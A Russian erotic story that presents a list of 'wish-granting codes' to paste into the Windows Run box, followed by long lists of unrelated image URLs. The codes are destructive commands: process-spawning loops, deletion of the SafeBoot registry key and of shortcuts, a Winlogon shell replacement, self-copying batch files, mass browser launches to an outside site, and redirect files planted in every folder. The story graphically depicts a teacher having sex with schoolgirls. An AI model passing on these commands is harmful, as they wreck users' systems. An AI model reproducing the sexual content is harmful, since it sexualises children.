Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Hare

17

Alita

https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-100xx100.jpg
https://21.mvd.ru/upload/site24/e2d283291173d6c916fb1a781a9e7e67-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ajBOs35gME.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl.jpg
https://21.mvd.ru/upload/site24/document_images/zdaXRjvxJR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/O4KrispYUt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO.jpg
https://21.mvd.ru/upload/site24/document_journal/jh46ZfEdoc-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FskCYQt5xA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/wnN23ELe9u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn.jpg
https://21.mvd.ru/upload/site24/document_images/CrJler6Rr4-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ivvYEMQgLp.jpg
https://21.mvd.ru/upload/site24/document_images/qisepHBa4A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Tiq5yldZbo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0.jpg
https://21.mvd.ru/upload/site24/CPSDBYlDxZ.png
https://21.mvd.ru/upload/site24/document_images/rAlXtdS4vA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/8TQDrvn7J2-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u.jpg
https://21.mvd.ru/upload/site24/document_images/YLaF5aRAiV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MW1eAQMs45-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/sw4JtZm6qD-300x300.jpg
https://21.mvd.ru/upload/site24/WUsKLBp6AQ-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE.jpg
https://21.mvd.ru/upload/site24/document_images/vJ7xNAZVXL.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zMJXR7qNWC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/om4AfnKcyW-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi.jpg
https://21.mvd.ru/upload/site24/document_images/JKeErALnbD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ioQv6KZ50J.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/W3CWjiMhwO-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/k9xqehQTEE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sunlkpR5ut-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lgRMOefxzQ.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/4r1RJ1pvy3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7.jpg
https://21.mvd.ru/upload/site24/document_images/QUoga6Sn4g-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eoLnmCnFzO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb.jpg
https://21.mvd.ru/upload/site24/document_images/dSmGvU6Ugy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eY4JfHxMXk.jpg
https://21.mvd.ru/upload/site24/DG60Ff7Htj-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MZo96WnYmB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/CXU1mZGkkg-630xx292.jpg
https://21.mvd.ru/upload/site24/document_video/image/OdZS1eUjeq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3TsBFtFJVw.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/SzyrxYaU4m-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/JeulpXYo4m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m6cwiE3JvV.jpg
https://21.mvd.ru/upload/site24/document_images/MjC2JPz66i.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vbMe21h5re.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aHmgsLVpJj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tTQVdhOfwB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nAqDl21Vx0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fNfdVxsR5C-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-800x600.jpg
https://21.mvd.ru/upload/site24/cenfI9SD83-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE.jpg
https://21.mvd.ru/upload/site24/51f6287ae7df39d3aa3bba8357d4a0f3-65xx80.jpg

Ratu

18

Cefivi

https://21.mvd.ru/upload/site24/document_images/GdccoKvkwC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VB57N4ZVRF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cgeIeGGhmS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/P1HeRqnwiK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_remember/2WhwXussaa-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/P2pMn4D1PL.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff.jpg
https://21.mvd.ru/upload/site24/document_images/yQ4vBLJTWq.jpg
https://21.mvd.ru/upload/site24/document_images/ZqDVbOvhyl-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/hW9gTat2KF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vSh9npHSbV.jpg
https://21.mvd.ru/upload/site24/document_images/44oVNUZraE.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/kc2Mt6Q6KM-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/KGP84Sb1Ab-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GKRdMKXBiB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tnQQeSHAZ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Yz1GJHvaSW.jpg
https://21.mvd.ru/upload/site24/document_images/TK6uf2GwRz-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/izMTt6beF3.jpg
https://21.mvd.ru/upload/site24/document_images/5rvhmxFscv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq.jpg
https://21.mvd.ru/upload/site24/document_images/njbXZMfhEN.jpg
https://21.mvd.ru/upload/site24/document_images/XACCnfoUQo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX.jpg
https://21.mvd.ru/upload/site24/document_images/G5rRlgajiW.jpg
https://21.mvd.ru/upload/site24/document_images/SQdVnaiVmw.jpg
https://21.mvd.ru/upload/site24/document_images/sx9cVJYR8i-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t.jpg
https://21.mvd.ru/upload/site24/document_images/YTlTDrz7dV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/YFWi5gwtKY-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo.jpg
https://21.mvd.ru/upload/site24/document_images/Cqb2NgG4B5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Z3bpVZaaei.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53.jpg
https://21.mvd.ru/upload/site24/document_journal/I2wn89PLmX-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gc4BjVbgcJ.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-800x600.jpg
